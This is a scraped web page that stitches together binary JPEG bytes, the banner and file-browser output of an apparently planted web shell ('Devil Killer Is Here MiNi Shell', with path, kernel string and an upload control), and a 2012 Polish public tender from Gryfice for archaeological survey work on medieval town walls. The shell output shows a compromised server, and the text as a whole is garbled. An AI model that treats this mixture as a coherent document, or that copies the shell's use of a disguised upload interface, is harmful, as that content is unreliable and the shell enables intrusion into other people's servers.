JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/367220-N-2012.html

<p class="kh_header"><b>Gryfice: Uzyskanie pozwolenia i przeprowadzenie sondażowych badań archeologicznych                                        wraz z opracowaniem wyników, w celu ustalenia przebiegu linii murów obronnych w sąsiedztwie planowanej inwestycji związanej z zagospodarowaniem terenu przy Baszcie Prochowej                                w Gryficach</b><br>
<b>Numer ogłoszenia: 367220 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842047, faks 091 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uzyskanie pozwolenia i przeprowadzenie sondażowych badań archeologicznych                                        wraz z opracowaniem wyników, w celu ustalenia przebiegu linii murów obronnych w sąsiedztwie planowanej inwestycji związanej z zagospodarowaniem terenu przy Baszcie Prochowej                                w Gryficach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest:
    1) Sporządzenie wniosku o udzielenie pozwolenia na przeprowadzenie badań 
    archeologicznych związanych z ustaleniem przebiegu linii murów obronnych w sąsiedztwie 
    Baszty Prochowej w Gryficach oraz planowanej lokalizacji parkingu dla samochodów 
    osobowych wraz z częścią rekreacyjno-wypoczynkową przy ul. Leśnej (dz. nr 54/9 obr. 10
    Gryfice) - w załączeniu plan sytuacyjny.
    Zgodnie z zaleceniami konserwatorskimi ZN.5183.46.2012.AM z 04.07.2012 r., 
    stanowiącymi załącznik do niniejszego opisu przedmiotu zamówienia, wydanymi                            
    przez Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków, wniosek                             
    o pozwolenie na przeprowadzenie badań archeologicznych powinien zawierać:
    - ramowe określenie terminu realizacji prac archeologicznych;
    - wskazanie wykonawcy prac archeologicznych;
    - program prac archeologicznych opracowany przez wykonawcę prac archeologicznych 
      wraz z załącznikami określonymi w § 9 rozporządzenia Ministra Kultury i Dziedzictwa 
      Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac 
      restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych 
      i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań 
      archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 982).
    2) Uzyskanie pozwolenia wymaganego przepisami prawa.
    3) Na podstawie pozwolenia na przeprowadzenie ww. badań archeologicznych, wykonanie 
    niezbędnych prac terenowych i kameralnych, ze sporządzeniem dokumentacji badań 
    archeologicznych, określonej w rozporządzeniu Ministra Kultury i Dziedzictwa 
    Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac 
    restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych 
    i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych   
    (Dz. U. z 2011 r. Nr 165 poz. 982), w szczególności sporządzenie  sprawozdania                               
    z wykonanych badań archeologicznych, stwierdzającego m.in. możliwość rozpoczęcia 
    przez Zamawiającego prac projektowych i robót budowlanych przy realizacji planowanej 
    inwestycji.
    4) Zabezpieczenie terenu prac archeologicznych w sposób zapewniający bezpieczeństwo 
    ludzi i mienia, zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia                         
    26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. 
    Nr 129, poz. 844, z późn. zm.), oraz przepisów Prawa budowlanego.
    5) Uporządkowanie terenu badań po zakończeniu prac badawczych, w sposób                             
    nie powodujący zniszczenia pozostawionych tamże zabytków archeologicznych,                       
    chyba że wynikną inne okoliczności w wyniku decyzji lub postanowień odpowiednich 
    urzędów, służb czy instytucji.
    6) Magazynowanie, konserwacja i dozór pozyskanych dóbr kultury i przekazanie ich, 
    zgodnie z decyzją Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków,                             
    do wskazanych zbiorów muzealnych.
    7) Uzyskanie od Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków 
    potwierdzenia zakończenia i odbioru końcowego prac terenowych objętych zamówieniem.
    8) Sporządzenie geodezyjnej inwentaryzacji powykonawczej linii przebiegu murów 
    obronnych - o ile zostanie ustalony ich przebieg w obszarze zainwestowania.
    9) Przekazanie kompletu ww. dokumentacji Zachodniopomorskiemu Wojewódzkiemu 
    Konserwatorowi Zabytków w Szczecinie. 
2. Wykonawca będzie zobowiązany wykonać przedmiot zamówienia zgodnie ze specyfikacją 
    istotnych warunków zamówienia, postanowieniami umowy, ofertą przetargową, metodyką  
    badań archeologicznych oraz wskazaniami i warunkami Zachodniopomorskiego 
    Wojewódzkiego Konserwatora Zabytków (w tym dotyczącymi zakresu i rodzaju badań) 
    zawartymi w zaleceniach konserwatorskich do planowanego przedsięwzięcia.
3. Ponadto zamówienie należy wykonywać w sposób gwarantujący spełnienie warunków:
    1) ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U.                 
        z 2003 r. Nr 162, poz. 1568, z późn. zm.),
    2) przepisów wykonawczych do wyżej wymienionej ustawy,
    3) właściwych przepisów bhp i ppoż.
4. Wykonawca dla wypełnienia swoich zobowiązań powinien zapewnić doświadczone                       
    i wykwalifikowane osoby zdolne do prowadzenia wszelkich powierzonych zadań, zgodnie 
    z obowiązującymi przepisami prawa i w zgodzie z postanowieniami odpowiednich decyzji, 
    uzgodnieniami i opiniami, warunkującymi prawidłową realizację zamówienia.
5. Wymienione w rozdz. V pkt 1.3. SIWZ osoby nie wyczerpują wymagań dla rzetelnego 
    wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne 
    wymagania Zamawiającego. Wykonawca powinien zapewnić swoim specjalistom 
    niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, którzy mogą być 
    niezbędni do właściwego wykonania umowy. Wykonawca uwzględni w ofercie każdą 
    konieczność uzupełnienia zespołu specjalistów wynikającą z przepisów prawa, decyzji, 
    uzgodnień i porozumień, które są niezbędne do kompleksowej realizacji zamówienia.   
    Kompletne wynagrodzenie całego personelu oraz wszelkie koszty związane z obsługą 
    muszą być zawarte w cenie oferty Wykonawcy.
6. Zamawiający informuje, że korzystanie z materiałów Państwowego Zasobu Geodezyjnego 
    i Kartograficznego jest odpłatne. Materiały te obejmują między innymi:
    1) wydruki mapy ewidencji gruntów i budynków oraz mapy zasadniczej,
    2) udostępnianie mapy ewidencji gruntów i budynków oraz mapy zasadniczej w formie 
        numerycznej,
    3) wypisy ewidencji gruntów i budynków,
    4) udostępnianie ortofotomapy w formie numerycznej oraz wydruki.
    Konieczność naliczania oraz wysokość wyżej wymienionych opłat wynika z zapisów 
    rozporządzenia Ministra Infrastruktury z dnia 19 lutego 2004 roku w sprawie wysokości 
    opłat za czynności geodezyjne i kartograficzne oraz udzielanie informacji, a także 
    wykonywanie wyrysów i wypisów z operatu ewidencyjnego.
7. Wykonawca zobowiązany będzie do posiadania ubezpieczenia od odpowiedzialności   
    cywilnej z tytułu prowadzonej działalności gospodarczej na sumę ubezpieczenia  
    co najmniej 200.000,00 zł, przez cały okres realizacji prac terenowych, tj. przynajmniej  
    do dnia podpisania przez strony protokołu odbioru końcowego prac terenowych.
8.	Użycie sprzętu mechanicznego do prowadzenia prac ziemnych może nastąpić jedynie                  
    po uzyskaniu pisemnej akceptacji Zamawiającego poprzedzonej pisemnym wystąpieniem
    Wykonawcy o zamiarze użycia takiego sprzętu.
Pożądany przez Zamawiającego termin wykonania zamówienia do 60 dni od daty podpisania umowy.     
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 specyfikacji oraz wzór umowy stanowiący załącznik nr 7 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.19.14-3, 71.51.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga zabezpieczenia oferty wadium:
a) Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium                                  
    w wysokości 2.000,00 PLN (słownie: dwa tysiące pięćset złotych 00/100).
b) Wadium może być wniesione w:
     - pieniądzu;
     - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                      
       z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
     - gwarancjach bankowych;
     - gwarancjach ubezpieczeniowych;
     - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia                      
       9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.     
       Dz. U. z 2007 r. Nr 42 poz. 275 z późn. zm.).
c) Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym 
     O/Gryfice nr rachunku 30 9376 0001 0000 0433 2001 0013, z dopiskiem na przelewie: Wadium 
     w postępowaniu na badania archeologiczne.
d) Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
     - pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
     - innej niż pieniądz, oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia                 
       w ofercie.
e) Z  treści gwarancji / poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie 
    zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty 
    Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 
    ustawy Pzp.
f) Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium 
    zostanie wykluczony z postępowania, a jego oferta zostanie  uznana za odrzuconą.
g) Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet 
     zabezpieczenia należytego wykonania umowy określa ustawa Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat                        przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy                        - w tym okresie, wykonał co najmniej dwa zamówienia polegające na wykonaniu badań archeologicznych na średniowiecznych fortyfikacjach miejskich lub zamkowych, na stanowisku obejmującym co najmniej 1 ar powierzchni badań, oraz potwierdzi odrębnymi dokumentami,                 że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje bądź będzie dysponował jedną osobą posiadającą doświadczenie, wykształcenie i kwalifikacje odpowiednie do stanowiska,                   jakie zostanie jej powierzone, tj.:
a) posiadającą uprawnienia zgodne z rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U.                    Nr 165, poz. 987), tj. posiada wykształcenie magistra uzyskane na kierunku archeologia i odbyła                 co najmniej 12 miesięczną praktykę w zakresie badań archeologicznych,
b) posiadającą łącznie co najmniej 12 miesięczne doświadczenie przy badaniach archeologicznych prowadzonych w terenie na średniowiecznych fortyfikacjach miejskich lub zamkowych.                      Przy ustalaniu okresu doświadczenia nie uwzględnia się uczestnictwa w badaniach archeologicznych prowadzonych metodą powierzchniową, nadzorów archeologicznych                             
i rozpoznawania obiektów archeologicznych przy pomocy odwiertów oraz udziału                                  w opracowywaniu zabytków ruchomych odkrytych w trakcie badań archeologicznych,                               c) która brała udział w wykonywaniu badań archeologicznych przy średniowiecznych fortyfikacjach miejskich lub zamkowych o łącznej powierzchni rzutu stanowisk archeologicznych minimum 1 ar w ramach jednych badań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że posiada aktualną i opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie niższą niż 200.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu                                 lub umówionego terminu wykonania zamówienia w przypadku wystąpienia co najmniej jednej                 z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
2. Zmiany umowy mogą dotyczyć:
    1) wynagrodzenia wykonawcy w razie ustawowej zmiany stawki podatku od towarów i usług 
        (VAT);
    2) warunków płatności;
    3) terminów realizacji zamówienia;
    4) zakresu badań w stopniu nie wykraczającym poza określenie przedmiotu zamówienia 
        zawarte w SIWZ;
    5) zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy i osób 
         nadzorujących wykonanie zamówienia po stronie Zamawiającego;
     6) podwykonawstwa za uprzednią zgodą Zamawiającego:
         a) powierzenia podwykonawcom innej części zamówienia niż wskazana w ofercie 
             Wykonawcy, lub nie wskazanej w ofercie;
         b) zmiany podwykonawcy na etapie realizacji zamówienia.
3.	Zmiany, o których mowa w ust. 2 mogą być dokonane w następujących przypadkach:
     1) jeżeli zmiany wynikają z zaleceń Wojewódzkiego Konserwatora Zabytków, lub pozwolenia,                         
         w szczególności jeżeli Zachodniopomorski Wojewódzki Konserwator Zabytków wyznaczył 
         inne terminy, lub nałożył na Strony inne obowiązki niż wskazane w niniejszej umowie;
     2) jeżeli w trakcie badań wystąpi konieczność zmiany technologii wykonania badań z uwagi                            
          na okoliczności nieznane w momencie podpisania umowy;
     3) w przypadku zmiany programu badań wynikającego z zaleceń Zachodniopomorskiego  
          Wojewódzkiego Konserwatora Zabytków, lub z konieczności zwiększenia bezpieczeństwa 
          wykonania prac lub ich usprawnienia;
     4) w razie wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają  
          wprowadzenie zmian do umowy;
     5) jeżeli zostanie zlecone dodatkowe zamówienie, którego wykonanie wymaga dodatkowego 
         czasu, a bez jego ukończenia nie można zakończyć badań;
     6) jeżeli zalecenia Wojewódzkiego Konserwatora Zabytków wymagają czasu na dostosowanie 
         się Wykonawcy do takiej zmiany;
     7) w razie opóźnienia Zamawiającego w przekazaniu terenu badań, lub w zakresie 
         dokonywania odbiorów;
     8) w okolicznościach nie wynikających z winy Wykonawcy, w przypadku przedłużającej się 
         procedury uzyskiwania pozwolenia na prowadzenie badań, lub procedur odbiorowych, albo 
         przedłużającej się procedury uzyskiwania przez Zamawiającego zezwolenia na wejście                   
         na teren, co do którego domniemywa się występowania pozostałości murów obronnych;
     9) w przypadku wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych, w tym 
         warunków atmosferycznych typowych w okresie zimowym, lub nieprzewidzianych trudnych 
         warunków terenowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zgk.gryfice.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 10:00, miejsce: Zakład Gospodarki Komunalnej, ul. Zielona 5 w Gryficach, sekretariat, pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 02.11.2012.</p>





